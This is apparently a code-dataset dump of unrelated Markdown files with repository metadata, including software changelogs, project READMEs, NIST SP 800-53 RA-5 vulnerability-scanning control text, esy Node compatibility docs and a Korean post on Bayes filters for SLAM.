ini components screens ([7ab12f1](https://github.com/sentrei/sentrei/commit/7ab12f106068c80b4354efc69f49423449a69b00)) # @sentrei/atoms [1.3.0](https://github.com/sentrei/sentrei/compare/@sentrei/atoms@1.2.12...@sentrei/atoms@1.3.0) (2021-07-23) ### Bug Fixes - remove chakra ui ts files ([5a33aed](https://github.com/sentrei/sentrei/commit/5a33aedd8f2d13e9267a09bb4863615aa2571117)) ### Features - complete upgrade tailwind nxrl components ([3f27c90](https://github.com/sentrei/sentrei/commit/3f27c90c9530015fd5d74574414604fa1e8fe271)) - ini storybook packages ([d6b975d](https://github.com/sentrei/sentrei/commit/d6b975d14173ecf47968d90bc9bd932be00c752b)) ### Dependencies - **@sentrei/next:** upgraded to 1.8.0 ## @sentrei/atoms [1.2.12](https://github.com/sentrei/sentrei/compare/@sentrei/atoms@1.2.11...@sentrei/atoms@1.2.12) (2021-04-08) ### Dependencies - **@sentrei/next:** upgraded to 1.7.0 - **@sentrei/themes:** upgraded to 1.2.0 ## @sentrei/atoms [1.2.11](https://github.com/sentrei/sentrei/compare/@sentrei/atoms@1.2.10...@sentrei/atoms@1.2.11) (2021-04-02) ### Dependencies - **@sentrei/next:** upgraded to 1.6.8 - **@sentrei/themes:** upgraded to 1.1.5 ## @sentrei/atoms [1.2.10](https://github.com/sentrei/sentrei/compare/@sentrei/atoms@1.2.9...@sentrei/atoms@1.2.10) (2021-03-31) ### Dependencies - **@sentrei/next:** upgraded to 1.6.7 - **@sentrei/themes:** upgraded to 1.1.4 ## @sentrei/atoms [1.2.9](https://github.com/sentrei/sentrei/compare/@sentrei/atoms@1.2.8...@sentrei/atoms@1.2.9) (2021-03-30) ### Dependencies - **@sentrei/next:** upgraded to 1.6.6 ## @sentrei/atoms [1.2.8](https://github.com/sentrei/sentrei/compare/@sentrei/atoms@1.2.7...@sentrei/atoms@1.2.8) (2021-03-29) ### Dependencies - **@sentrei/next:** upgraded to 1.6.5 ## @sentrei/atoms [1.2.7](https://github.com/sentrei/sentrei/compare/@sentrei/atoms@1.2.6...@sentrei/atoms@1.2.7) (2021-03-28) ### Performance Improvements - complete refactor deps ([b0d4af4](https://github.com/sentrei/sentrei/commit/b0d4af47a9c4156fd24187ab78a8aa9607bd4b07)) ### Dependencies - **@sentrei/next:** upgraded to 1.6.4 - **@sentrei/themes:** upgraded to 1.1.3 ## @sentrei/atoms [1.2.6](https://github.com/sentrei/sentrei/compare/@sentrei/atoms@1.2.5...@sentrei/atoms@1.2.6) (2021-03-27) ### Performance Improvements - upgrade with ncu ([bf5f296](https://github.com/sentrei/sentrei/commit/bf5f2966fc9cb75294d2b3f2355081a86a06c14a)) ## @sentrei/atoms [1.2.5](https://github.com/sentrei/sentrei/compare/@sentrei/atoms@1.2.4...@sentrei/atoms@1.2.5) (2021-03-22) ### Performance Improvements - revert react version to experimental ([a33270b](https://github.com/sentrei/sentrei/commit/a33270bc053426f7b53305eca7ebe6b4076668f5)) - upgrade and pin react version to 16.14.0 ([f8d7940](https://github.com/sentrei/sentrei/commit/f8d794076af5c20033436b4eeae4729e2237f75c)) ## @sentrei/atoms [1.2.4](https://github.com/sentrei/sentrei/compare/@sentrei/atoms@1.2.3...@sentrei/atoms@1.2.4) (2021-03-22) ### Performance Improvements - refactor storybook stories custom path ([bcb069f](https://github.com/sentrei/sentrei/commit/bcb069f32f78e30bcfb51b16809204fe8c3a6306)) ## @sentrei/atoms [1.2.3](https://github.com/sentrei/sentrei/compare/@sentrei/atoms@1.2.2...@sentrei/atoms@1.2.3) (2021-03-22) ### Performance Improvements - refactor storybook version ([bd290fd](https://github.com/sentrei/sentrei/commit/bd290fd54e11df38f9b7d7e49c9664ce3f8c16c7)) - revert back to react experimental ([e434b5b](https://github.com/sentrei/sentrei/commit/e434b5bf19e7021e5b325140fdfa948f3cb750b9)) ## @sentrei/atoms [1.2.2](https://github.com/sentrei/sentrei/compare/@sentrei/atoms@1.2.1...@sentrei/atoms@1.2.2) (2021-03-22) ### Performance Improvements - migrate react version to 17 ([e8f2bc7](https://github.com/sentrei/sentrei/commit/e8f2bc7089f1b52d9126af309b37dc48080a4421)) ## @sentrei/atoms [1.2.1](https://github.com/sentrei/sentrei/compare/@sentrei/atoms@1.2.0...@sentrei/atoms@1.2.1) (2021-03-22) ### Performance Improvements - upgrade chakra ui ([43be66b](https://github.com/sentrei/sentrei/commit/43be66b0fcd99e5bf496156bbecb3f292a395365)) # @sentrei/atoms [1.2.0](https://github.com/sentrei/sentrei/compare/@sentrei/atoms@1.1.0...@sentrei/atoms@1.2.0) (2021-03-20) ### Features - ini how section ([6855b85](https://github.com/sentrei/sentrei/commit/6855b85b1da35d6ff6ac232b71818d1672607a5b)) # @sentrei/atoms [1.1.0](https://github.com/sentrei/sentrei/compare/@sentrei/atoms@1.0.0...@sentrei/atoms@1.1.0) (2021-03-20) ### Features - complete refactor components ([6d13c44](https://github.com/sentrei/sentrei/commit/6d13c44e7b58c1eee353a7c3b9e71edfaa764096)) - complete refactor dashboard ([2337501](https://github.com/sentrei/sentrei/commit/2337501423d8770572c232c858fac71c0599327c)) - ini components dir ([c60084b](https://github.com/sentrei/sentrei/commit/c60084b60ab6692d851372080135e05a0490454a))
50.46383
139
0.765916
yue_Hant
0.163095
4840f1ffd88f197b924b9371a9dac9fd73194c3c
2,635
md
Markdown
CHANGELOG.md
gbs74/delicious-api-ruby
39518453451e36ff1cbcce17e85fa0df3a5701af
[ "MIT" ]
6
2015-01-10T02:55:40.000Z
2020-11-19T03:38:11.000Z
CHANGELOG.md
gbs74/delicious-api-ruby
39518453451e36ff1cbcce17e85fa0df3a5701af
[ "MIT" ]
19
2019-08-19T09:45:59.000Z
2019-08-19T09:48:11.000Z
CHANGELOG.md
gbs74/delicious-api-ruby
39518453451e36ff1cbcce17e85fa0df3a5701af
[ "MIT" ]
2
2015-01-22T04:44:28.000Z
2016-05-19T21:53:03.000Z
# Changelog ## master * CHANGED: Ruby style. ## Release 0.4.0 * FIXED: A trivial bug causes the test `test_request_waits_necessary_time_between_requests` to fail in case the subsequent request is sent exactly 1 second after the prior one. * FIXED: Object#blank? is always redefined regardless already defined before. * CHANGED: Removed dependency from Echoe. * REMOVED: Removed old setup.rb installation method. ## Release 0.3.0 * FIXED: Compatibility fixes for Ruby 1.9. WWW::Delicious is now 100% compatible with 1.9. You should remember to define the proper content encoding with magic comments when working with UTF-8/MultiByte XML or Ruby files, see http://redmine.ruby-lang.org/wiki/ruby-19/ScriptEncoding (closes #142). * FIXED: Forced Rakefile to require Echoe >= 3.1 to prevent outdated .gemspec files (closes #143). * CHANGED: Don't use File.dirname(__FILE__) in require statement to prevent recursive inclusions. ## Release 0.2.0 * ADDED: :base_uri initialization option allows to create a new instance specifying a custom base_uri for all API calls. This is useful, for example, if you want to use ma.gno.lia Mirror'd APIs (http://wiki.ma.gnolia.com/Mirror%27d_API) instead the del.icio.us one (thanks to Jörg Battermann). * ADDED: two new REXML::Element core extension elements to enhance interaction with node elements. * FIXED: a wrong indentation in README file causes all list items to be rendered as source code. * FIXED: Missing WWW::Delicious::Bundle#to_s method causes a class ID representation to be returned. * FIXED: Missing unit tests for post_ calls (closes #18). * FIXED: Added test for `shared` Post attribute and fixed an issue with duplicate `replace` method definition (closes #11). * CHANGED: improved documentation and added more examples (closes #21). * CHANGED: REXML::Element#attribute_value core extension has been renamed to REXML::Element#if_attribute_value. * CHANGED: Renamed TESTCASE_PATH to TESTCASES_PATH. * CHANGED: WWW::Delicious::Tag, WWW::Delicious::Bundle, WWW::Delicious::Post now extend WWW::Delicious::Element. Simplified classes. * CHANGED: WWW::Delicious::Tag#to_s always returns a string even if name is nil. * CHANGED: WWW::Delicious::Tag :count attribute is now stored and returned as Fixnum instead of String. * CHANGED: Unit test reorganization (closes #22). * CHANGED: Simplified and tidyfied test system with Mocha (closes #19). * CHANGED: Various internal API methods have been renamed for coherence with their new scope. * CHANGED: Integrated Echoe, cleaned Rakefile (closes #23). ## Release 0.1.0 (2008-05-11) * Initial public release.
39.328358
297
0.766603
eng_Latn
0.972678
484135d1c83dd22eea1f9cf96e8183638c590daf
570
md
Markdown
content/english/resources/conferences/latin-tech-conference-latinx-tech-summit.md
iamrajee/website
935914a8438d4053461a8c96c417eda975687dfc
[ "MIT" ]
1
2019-10-30T00:12:51.000Z
2019-10-30T00:12:51.000Z
content/english/resources/conferences/latin-tech-conference-latinx-tech-summit.md
iamrajee/website
935914a8438d4053461a8c96c417eda975687dfc
[ "MIT" ]
null
null
null
content/english/resources/conferences/latin-tech-conference-latinx-tech-summit.md
iamrajee/website
935914a8438d4053461a8c96c417eda975687dfc
[ "MIT" ]
null
null
null
--- title: Latin Tech Conference image: "/assets/img/resources/conferences/techduels.png" description: We started the Latin Tech Conference because the industry needed a space where the smartest, most diverse and ambitious LatinX people could connect and accelerate their potential. It’s needed more than ever, as the pace of tech jobs increase, and demand outstrips supply. The Latin Tech Conference is that space – where technology meets opportunity, opportunity meets companies, companies meet diversity and diversity becomes reality. link: https://latintech.io/ ---
81.428571
447
0.808772
eng_Latn
0.996302
484163d3b480face0c1e33daeaf216481900ee8f
342
md
Markdown
_countries/swaziland.md
ABA-Center-for-Human-Rights/aba-icc
f9133a6fb68c6c1fa51a997128a53bf1b423d526
[ "MIT" ]
null
null
null
_countries/swaziland.md
ABA-Center-for-Human-Rights/aba-icc
f9133a6fb68c6c1fa51a997128a53bf1b423d526
[ "MIT" ]
61
2015-01-22T15:08:08.000Z
2016-12-14T18:01:05.000Z
_countries/swaziland.md
isabella232/aba-icc
94e870caa4b377228e6f5e1b5753675db8623fb1
[ "MIT" ]
3
2015-02-19T16:25:25.000Z
2017-01-07T14:33:44.000Z
--- title: "Swaziland" published: true featured_image_path: featured_image_attribution: geocode: SWZ iso_code: SZ territory: state_party: false signed_but_not_ratified: false signed_date: ratified_or_acceded_date: entry_into_force_date: ratified_apic_date: genocide: crimes_against_humanity: aggression: war_crimes: note: slug: swaziland ---
15.545455
30
0.839181
eng_Latn
0.453694
48422dfb9becaa2a1a3973d31a7e15c33ec90072
3,823
md
Markdown
_posts/SLAM/2019-09-20-Bayes-Filter.md
sudo-hoon/sudo-hoon.github.io
d362905f193f84d65d6cc7a2184a0f78b0247d1e
[ "MIT" ]
null
null
null
_posts/SLAM/2019-09-20-Bayes-Filter.md
sudo-hoon/sudo-hoon.github.io
d362905f193f84d65d6cc7a2184a0f78b0247d1e
[ "MIT" ]
null
null
null
_posts/SLAM/2019-09-20-Bayes-Filter.md
sudo-hoon/sudo-hoon.github.io
d362905f193f84d65d6cc7a2184a0f78b0247d1e
[ "MIT" ]
null
null
null
--- layout: post title: "Bayes Filter" date: "2019-09-20" # slug: "example_content" imagefeature: foo.png description: "This post is based on SLAM lecture" category: - SLAM # tags will also be used as html meta keywords. tags: - SLAM - Robot mapping comments: true use_math: true show_meta: true --- > 본 게시글은 Cyrill Stachniss의 [Robot mapping(WS 2013/14)](http://ais.informatik.uni-freiburg.de/teaching/ws13/mapping/) 강의를 요약 및 정리한 글입니다. > 틀린 내용을 지적해주시면 감사드리겠습니다. # Bayes filter ### state estimation * State estimation 문제에서 풀고자 하는 문제의 정의는 다음과 같다. * Goal : $p(x\|z,u)$ * 이때, bayes theorem[^1] 에 기반하여 위의 state estimation을 recursive하게 정리할 수 있고 정리된 수식을 recursive bayes filter라고 부른다. * robot mapping 에서 기본적인 문제 정의는 다음 수식과 같다. * $bel(x_t) = p(x_t\|z_{1:t}, u_{1:t})$ , $x_t$ : t번 째 state, $z_t$ : t번째 관측 값, $u_t$ : t번째 command * 위 수식을 Marcov assumption과 Law of total probabilty를 이용하여 정리하면 아래와 같다. * $bel(x_t) = \eta p(z_t\|x_t)\int{p(x_t\|x_{t-1},u_t)bel(x_{t-1})dx_{t-1}} = \eta p(z_t\|x_t) \bar{bel}(x_t)$ 위 수식은 아래와 같은 두 가지 수학적 의미로 나눌 수 있다. ### Prediction step : $\bar{bel}(x_t) = \int{p(x_t\|x_{t-1},u_t)bel(x_{t-1})dx_{t-1}}$ * 바로 직전의 state와 현재의 command가 주어졌을 때, 추정되는 현재의 state -> $p(x_t\|x_{t-1},u_t)$ : motion model ### Correction step : $bel(x_t) = \eta p(z_t\|x_t) \bar{bel}(x_t)$ * 현재 추정한 state를 관측 값에 기반하여 수정한 최종적인 예측되는 현재의 state -> $p(z_t\|x_t)$ : observation model ---- > $p(z_t\|x_t)$ 는 likelihood function으로 posterior를 기반으로 prior를 추정하는 수학적 form을 가진다. 하지만 우리는 관측 값(prior)는 센서를 통해 얻지만 state(posterior)는 추정 값이다. 이 수식이 갖는 의미는 X_t를 x_t로 예측했을 때, 센서를 통해 얻은 z_t가 나올 가능성이 있는가를 본다. 즉, 관측 값이 $^{bel}$ 를 통해 예측학 $x_t$가 가능성이 적다면 적은 weight를 발생시킬 것이고 가능성이 크다면 큰 weight를 발생시켜 예측 값을 correction한다. ---- * 문제는 정의되었다. 하지만 이 문제를 어떻게 해결할 것인가? -> 어떻게 model을 정의할 것인가? ## Motion Model : $p(x_t\|x_{t-1},u_t)$ * 대표적인 motion model은 두 가지 있다. 1. Odometry-based : wheel encoders를 통해 motion command를 내린다. -> 지면의 불 균일성, 바퀴간의 기압차 등으로 노이즈 발생 2. Velocity-based : robot의 속도를 통해 motion command를 내린다. -> 속도 센서의 오차 등으로 노이즈 발생 -> 일반적으로 Odometry-based motion model이 정확하다. ### Odometry model * Robot이 $(\bar x, \bar y, \bar\theta)$ 에서 $(\bar x', \bar y', \bar \theta')$로 이동할 때, odometry 정보는 $u = (\delta_{rot1}, \delta_{trans}, \delta_{rot2})$ 로 주어진다. 회전, 이동, 회전의 형태로 sequential한 motion command가 정의된다. ### Velocity model * Robot이 $(\bar x, \bar y, \bar \theta)$ 에서 $(\bar x', \bar y', \bar \theta')$로 이동할 때, velocity 정보는 $u = (v, w)$ 로 주어진다. 회전과 이동이 동시에 motion command로 정의된다. -> 이러한 정의는 최종적인 robot의 orientation을 제한시킨다. -> 회전 term에 추가적인 variable을 둠으로써 orientation 회전을 표현한다. ## Observation Model : $p(z_t\|x_t)$ * 한번의 sensor scan(ex. $\theta_1 ~ \theta_2$까지의 거리 측정)은 K번의 측정을 한다. $z_t = {z_T ^1, ...., z_t ^k}$ 만약에 각 측정이 independent 하다면 $p(z_t\|x_t,m) = \prod_{i=1} p(z_t ^i \| x_t, m)$로 표현할 수 있다. 즉, 단일 측정 결과들의 곱의 형태로 표현할 수 있다. 이러한 단일 측정 결과들을 어떻게 표현할 것인가? - 1. beam-endpoint model __-----------? __ 2. Ray-cast Model 4개의 정보를 합쳐서 측정 결과를 모델링 한다 - 1. dynamic obstacle 2. obastacle + measurement noise 3. maximum range 4. uniform random noise ### Range-bearing[^2] sensor를 이용한 측정 모델 1. range-finder를 이용한 거리 $z_t ^i = (r_t ^i, \phi _t ^i )^T$ 2. robot의 pose : $(x,y,\theta)^T$ 3. j 번째 feature의 위치 : location $(m_{j,x}, m_{j,y})^T$ - Sensor model : $\begin{pmatrix} r_t^i \\ \phi_t^i \end{pmatrix} = \begin{pmatrix} \sqrt{(m_{j,x}-x)^2 + (m_{j,y}-y)^2} \\ atan2(m_{j,y}-y, m_{j,x}-x) -\theta \end{pmatrix} + Q_t$ - $Q_t$는 sensor noise, 미리 modeling 된 노이즈 ---- > [^1]: $P(A\|B) = \frac{P(B\|A)P(A)}{P(B)} = \frac {P(A,B)}{P(B)}$, https://darkpgmr.tistory.com/119 참고 > [^2]: horisontal angle, https://en.wikipedia.org/wiki/Bearing\_(navigation) 참고
30.102362
311
0.620455
kor_Hang
0.999963
4843b765f5a3273babfdfdd0ac951ce365919f7b
669
md
Markdown
README.md
gn3112/rcan_navigation
a2430d7e606f2a535daf3cd1b5a8e36743f24de7
[ "MIT" ]
null
null
null
README.md
gn3112/rcan_navigation
a2430d7e606f2a535daf3cd1b5a8e36743f24de7
[ "MIT" ]
null
null
null
README.md
gn3112/rcan_navigation
a2430d7e606f2a535daf3cd1b5a8e36743f24de7
[ "MIT" ]
null
null
null
# Sim2Real for joint robotic locomotion and manipulation with RCAN This repo complements [this](https://github.com/gn3112/robotics_drl/) project of robotics learning by providing Sim2Real transfer (from simulation to real-world) of the policy learned in simulation. The method used for Sim2Real borrows the idea of [RCAN](https://arxiv.org/abs/1812.07252) and extends it to locomotion and simultaneous manipulation and locomotion in arbitrary scenes. ## Dataset generation ![dataset_generation](generated_scene_domain_rand.png) ## Validation results (in simulation) ![results_valid](results_valid_sim.png) ## Real-world results ![results_real](results_real.png)
41.8125
383
0.804185
eng_Latn
0.857901
4844afd8eb728f04e9ba87309055ca9c27f3faa7
404
md
Markdown
README.md
IAmBullsaw/learndnd
cc5c74df5e1d1307c24fc8337e446d24d55b053d
[ "MIT" ]
1
2021-06-05T04:43:24.000Z
2021-06-05T04:43:24.000Z
README.md
IAmBullsaw/learndnd
cc5c74df5e1d1307c24fc8337e446d24d55b053d
[ "MIT" ]
null
null
null
README.md
IAmBullsaw/learndnd
cc5c74df5e1d1307c24fc8337e446d24d55b053d
[ "MIT" ]
null
null
null
# learndnd I've always wanted a simple online dnd guide which takes me on a small solo adventure to learn the basics of dnd rules. Nothing fancy, no bells and whistles. Simple things, clear rules, hard rail roading. ## Plan - [ ] Write a simple mission, starting in a tavern of course - [ ] Plan out how to write the app - [ ] Write the app - [ ] Launch it online so people can explain the rules to me
36.727273
119
0.732673
eng_Latn
0.998861
4844b11a5f4be599e27732f1ae7f98a8abf6a7a3
1,331
md
Markdown
site/versioned_docs/version-0.4.5/node-compatibility.md
timbertson/esy
94f3730ebedd2695b6b88548b3005f90e426516a
[ "BSD-2-Clause" ]
776
2017-11-21T03:03:39.000Z
2022-03-12T12:39:40.000Z
site/versioned_docs/version-0.4.5/node-compatibility.md
timbertson/esy
94f3730ebedd2695b6b88548b3005f90e426516a
[ "BSD-2-Clause" ]
934
2017-11-16T11:22:07.000Z
2022-03-21T10:45:15.000Z
site/versioned_docs/version-0.4.5/node-compatibility.md
timbertson/esy
94f3730ebedd2695b6b88548b3005f90e426516a
[ "BSD-2-Clause" ]
111
2017-12-09T09:20:25.000Z
2022-02-21T15:23:45.000Z
--- id: version-0.4.5-node-compatibility title: Node/npm Compatibility original_id: node-compatibility --- esy can install packages from npm registry. This means `esy install` can also install packages which contain JavaScript code. ## Accessing installed JS packages As opposed to a standard way of installing packages into project's `node_modules` directory esy uses [plug'n'play installation mechanism][yarn-pnp] (pnp for short) pioneered by [yarn][]. There are few differences though: - esy puts pnp runtime not as `.pnp.js` but as `_esy/default/pnp.js` (or `_esy/NAME/pnp.js` for a named sandbox with name `NAME`). - To execute pnp enabled `node` one uses `esy node` invocation. All binaries installed with npm packages are accessible via `esy COMMAND` invocation, few example: - To run webpack (comes from `webpack-cli`): ```bash % esy webpack ``` - To run `flow` (comes from `flow-bin` package): ```bash % esy flow ``` ## Caveats - Not all npm packages currently support being installed with plug'n'play installation mechanism. - Not all npm lifecycle hooks are supported right now (only `install` and `postinstall` are being run). [yarn-pnp]: https://github.com/arcanis/rfcs/blob/6fc13d52f43eff45b7b46b707f3115cc63d0ea5f/accepted/0000-plug-an-play.md [yarn]: https://github.com/yarnpkg/yarn
27.729167
119
0.743802
eng_Latn
0.960957
484525eb7bcb4b4be840037765633e4ba32e0d75
12,365
md
Markdown
docs/3-16-risk-assessment/ra-5-vulnerability-monitoring-and-scanning.md
BSafesSupport/NIST-SP-800-53-R5.github.io
be3b502dc34caba35702dc7759b71afcd81da78a
[ "MIT" ]
null
null
null
docs/3-16-risk-assessment/ra-5-vulnerability-monitoring-and-scanning.md
BSafesSupport/NIST-SP-800-53-R5.github.io
be3b502dc34caba35702dc7759b71afcd81da78a
[ "MIT" ]
null
null
null
docs/3-16-risk-assessment/ra-5-vulnerability-monitoring-and-scanning.md
BSafesSupport/NIST-SP-800-53-R5.github.io
be3b502dc34caba35702dc7759b71afcd81da78a
[ "MIT" ]
null
null
null
--- layout: page title: -- RA-5 VULNERABILITY MONITORING AND SCANNING parent: . 3.16 RISK ASSESSMENT nav_order: 31650 --- ## RA-5 VULNERABILITY MONITORING AND SCANNING <ins>Control</ins>: * a. Monitor and scan for vulnerabilities in the system and hosted applications [ _Assignment: organization-defined frequency and/or randomly in accordance with organization-defined process_ ] and when new vulnerabilities potentially affecting the system are identified and reported; * b. Employ vulnerability monitoring tools and techniques that facilitate interoperability among tools and automate parts of the vulnerability management process by using standards for: * 1 . Enumerating platforms, software flaws, and improper configurations; * 2 . Formatting checklists and test procedures; and * 3 . Measuring vulnerability impact; * c. Analyze vulnerability scan reports and results from vulnerability monitoring; * d. Remediate legitimate vulnerabilities [ _Assignment: organization-defined response times_ ] in accordance with an organizational assessment of risk; * e. Share information obtained from the vulnerability monitoring process and control assessments with [ _Assignment: organization-defined personnel or roles_ ] to help eliminate similar vulnerabilities in other systems; and * f. Employ vulnerability monitoring tools that include the capability to readily update the vulnerabilities to be scanned. <ins>Discussion</ins>: Security categorization of information and systems guides the frequency and comprehensiveness of vulnerability monitoring (including scans). Organizations determine the required vulnerability monitoring for system components, ensuring that the potential sources of vulnerabilities—such as infrastructure components (e.g., switches, routers, guards, sensors), networked printers, scanners, and copiers—are not overlooked. The capability to readily update vulnerability monitoring tools as new vulnerabilities are discovered and announced and as new scanning methods are developed helps to ensure that new vulnerabilities are not missed by employed vulnerability monitoring tools. The vulnerability monitoring tool update process helps to ensure that potential vulnerabilities in the system are identified and addressed as quickly as possible. Vulnerability monitoring and analyses for custom software may require additional approaches, such as static analysis, dynamic analysis, binary analysis, or a hybrid of the three approaches. Organizations can use these analysis approaches in source code reviews and in a variety of tools, including web-based application scanners, static analysis tools, and binary analyzers. Vulnerability monitoring includes scanning for patch levels; scanning for functions, ports, protocols, and services that should not be accessible to users or devices; and scanning for flow control mechanisms that are improperly configured or operating incorrectly. Vulnerability monitoring may also include continuous vulnerability monitoring tools that use instrumentation to continuously analyze components. Instrumentation-based tools may improve accuracy and may be run throughout an organization without scanning. Vulnerability monitoring tools that facilitate interoperability include tools that are Security Content Automated Protocol (SCAP)- validated. Thus, organizations consider using scanning tools that express vulnerabilities in the Common Vulnerabilities and Exposures (CVE) naming convention and that employ the Open Vulnerability Assessment Language (OVAL) to determine the presence of vulnerabilities. Sources for vulnerability information include the Common Weakness Enumeration (CWE) listing and the National Vulnerability Database (NVD). Control assessments, such as red team exercises, provide additional sources of potential vulnerabilities for which to scan. Organizations also consider using scanning tools that express vulnerability impact by the Common Vulnerability Scoring System (CVSS). Vulnerability monitoring includes a channel and process for receiving reports of security vulnerabilities from the public at-large. Vulnerability disclosure programs can be as simple as publishing a monitored email address or web form that can receive reports, including notification authorizing good-faith research and disclosure of security vulnerabilities. Organizations generally expect that such research is happening with or without their authorization and can use public vulnerability disclosure channels to increase the likelihood that discovered vulnerabilities are reported directly to the organization for remediation. Organizations may also employ the use of financial incentives (also known as “bug bounties”) to further encourage external security researchers to report discovered vulnerabilities. Bug bounty programs can be tailored to the organization’s needs. Bounties can be operated indefinitely or over a defined period of time and can be offered to the general public or to a curated group. Organizations may run public and private bounties simultaneously and could choose to offer partially credentialed access to certain participants in order to evaluate security vulnerabilities from privileged vantage points. <ins>Related Controls</ins>: CA-2, CA-7, CA-8, CM-2, CM-4, CM-6, CM-8, RA-2, RA-3, SA-11, SA-15, SC-38, SI-2, SI-3, SI-4, SI-7, SR-11. <ins>Control Enhancements</ins>: * (1) VULNERABILITY MONITORING AND SCANNING / UPDATE TOOL CAPABILITY<br> [Withdrawn: Incorporated into RA-5.] * (2) VULNERABILITY MONITORING AND SCANNING / UPDATE VULNERABILITIES TO BE SCANNED<br> **Update the system vulnerabilities to be scanned [ _Selection (one or more): [ Assignment: organization-defined frequency ] ; prior to a new scan; when new vulnerabilities are identified and reported_ ].** <ins>Discussion</ins>: Due to the complexity of modern software, systems, and other factors, new vulnerabilities are discovered on a regular basis. It is important that newly discovered vulnerabilities are added to the list of vulnerabilities to be scanned to ensure that the organization can take steps to mitigate those vulnerabilities in a timely manner. <ins>Related Controls</ins>: SI-5. * (3) VULNERABILITY MONITORING AND SCANNING / BREADTH AND DEPTH OF COVERAGE<br> **Define the breadth and depth of vulnerability scanning coverage.** <ins>Discussion</ins>: The breadth of vulnerability scanning coverage can be expressed as a percentage of components within the system, by the particular types of systems, by the criticality of systems, or by the number of vulnerabilities to be checked. Conversely, the depth of vulnerability scanning coverage can be expressed as the level of the system design that the organization intends to monitor (e.g., component, module, subsystem, element). Organizations can determine the sufficiency of vulnerability scanning coverage with regard to its risk tolerance and other factors. Scanning tools and how the tools are configured may affect the depth and coverage. Multiple scanning tools may be needed to achieve the desired depth and coverage. [SP 800-53A] provides additional information on the breadth and depth of coverage. <ins>Related Controls</ins>: None. * (4) VULNERABILITY MONITORING AND SCANNING / DISCOVERABLE INFORMATION<br> **Determine information about the system that is discoverable and take [ _Assignment: organization-defined corrective actions_ ].** <ins>Discussion</ins>: Discoverable information includes information that adversaries could obtain without compromising or breaching the system, such as by collecting information that the system is exposing or by conducting extensive web searches. Corrective actions include notifying appropriate organizational personnel, removing designated information, or changing the system to make the designated information less relevant or attractive to adversaries. This enhancement excludes intentionally discoverable information that may be part of a decoy capability (e.g., honeypots, honeynets, or deception nets) deployed by the organization. <ins>Related Controls</ins>: AU-13, SC-26. * (5) VULNERABILITY MONITORING AND SCANNING / PRIVILEGED ACCESS<br> **Implement privileged access authorization to [ _Assignment: organization-defined system components_ ] for [ _Assignment: organization-defined vulnerability scanning activities_ ].** <ins>Discussion</ins>: In certain situations, the nature of the vulnerability scanning may be more intrusive, or the system component that is the subject of the scanning may contain classified or controlled unclassified information, such as personally identifiable information. Privileged access authorization to selected system components facilitates more thorough vulnerability scanning and protects the sensitive nature of such scanning. <ins>Related Controls</ins>: None. * (6) VULNERABILITY MONITORING AND SCANNING / AUTOMATED TREND ANALYSES<br> **Compare the results of multiple vulnerability scans using [ _Assignment: organization-defined automated mechanisms_ ].** <ins>Discussion</ins>: Using automated mechanisms to analyze multiple vulnerability scans over time can help determine trends in system vulnerabilities and identify patterns of attack. <ins>Related Controls</ins>: None. * (7) VULNERABILITY MONITORING AND SCANNING / AUTOMATED DETECTION AND NOTIFICATION OF UNAUTHORIZED COMPONENTS<br> [Withdrawn: Incorporated into CM-8.] * (8) VULNERABILITY MONITORING AND SCANNING / REVIEW HISTORIC AUDIT LOGS<br> **Review historic audit logs to determine if a vulnerability identified in a [ _Assignment: organization-defined system_ ] has been previously exploited within an [ _Assignment: organization-defined time period_ ].** <ins>Discussion</ins>: Reviewing historic audit logs to determine if a recently detected vulnerability in a system has been previously exploited by an adversary can provide important information for forensic analyses. Such analyses can help identify, for example, the extent of a previous intrusion, the trade craft employed during the attack, organizational information exfiltrated or modified, mission or business capabilities affected, and the duration of the attack. <ins>Related Controls</ins>: AU-6, AU-11. * (9) VULNERABILITY MONITORING AND SCANNING / PENETRATION TESTING AND ANALYSES<br> [Withdrawn: Incorporated into CA-8.] * (10) VULNERABILITY MONITORING AND SCANNING / CORRELATE SCANNING INFORMATION<br> **Correlate the output from vulnerability scanning tools to determine the presence of multi-vulnerability and multi-hop attack vectors.** <ins>Discussion</ins>: An attack vector is a path or means by which an adversary can gain access to a system in order to deliver malicious code or exfiltrate information. Organizations can use attack trees to show how hostile activities by adversaries interact and combine to produce adverse impacts or negative consequences to systems and organizations. Such information, together with correlated data from vulnerability scanning tools, can provide greater clarity regarding multi-vulnerability and multi-hop attack vectors. The correlation of vulnerability scanning information is especially important when organizations are transitioning from older technologies to newer technologies (e.g., transitioning from IPv4 to IPv6 network protocols). During such transitions, some system components may inadvertently be unmanaged and create opportunities for adversary exploitation. <ins>Related Controls</ins>: None. * (11) VULNERABILITY MONITORING AND SCANNING / PUBLIC DISCLOSURE PROGRAM<br> **Establish a public reporting channel for receiving reports of vulnerabilities in organizational systems and system components.** <ins>Discussion</ins>: The reporting channel is publicly discoverable and contains clear language authorizing good-faith research and the disclosure of vulnerabilities to the organization. The organization does not condition its authorization on an expectation of indefinite non- disclosure to the public by the reporting entity but may request a specific time period to properly remediate the vulnerability. <ins>Related Controls</ins>: None. <ins>References</ins>: [ISO 29147], [SP 800-40], [SP 800-53A], [SP 800-70], [SP 800-115], [SP 800-126], [IR 7788 ], [IR 8011-4], [IR 8023].
124.89899
1,316
0.811727
eng_Latn
0.995814
4845346f3ec15a327a97791518f1180ba823f647
166
md
Markdown
README.md
dapperfu/python_Rigol
2754c811c574decfea7721c5647c6e32d4401a12
[ "MIT" ]
null
null
null
README.md
dapperfu/python_Rigol
2754c811c574decfea7721c5647c6e32d4401a12
[ "MIT" ]
null
null
null
README.md
dapperfu/python_Rigol
2754c811c574decfea7721c5647c6e32d4401a12
[ "MIT" ]
null
null
null
# Rigol Pythol Module. High level Python module for interacting with Rigol devices. ## Tested & Software Hardware: - python3.7 - Linux Ubunt 18.04 - Rigol DS1052D
16.6
60
0.746988
eng_Latn
0.783375
484900804d17b73ae6f87ecf0574acf6f35c9886
16,954
md
Markdown
chapter_deep-learning-computation/model-construction-pytorch.md
LinJianping/d2l-zh
fa4d48d1335f5f2cf5dc99e66fb975127be7e105
[ "Apache-2.0" ]
1
2019-11-19T02:32:26.000Z
2019-11-19T02:32:26.000Z
chapter_deep-learning-computation/model-construction-pytorch.md
LinJianping/d2l-zh
fa4d48d1335f5f2cf5dc99e66fb975127be7e105
[ "Apache-2.0" ]
null
null
null
chapter_deep-learning-computation/model-construction-pytorch.md
LinJianping/d2l-zh
fa4d48d1335f5f2cf5dc99e66fb975127be7e105
[ "Apache-2.0" ]
null
null
null
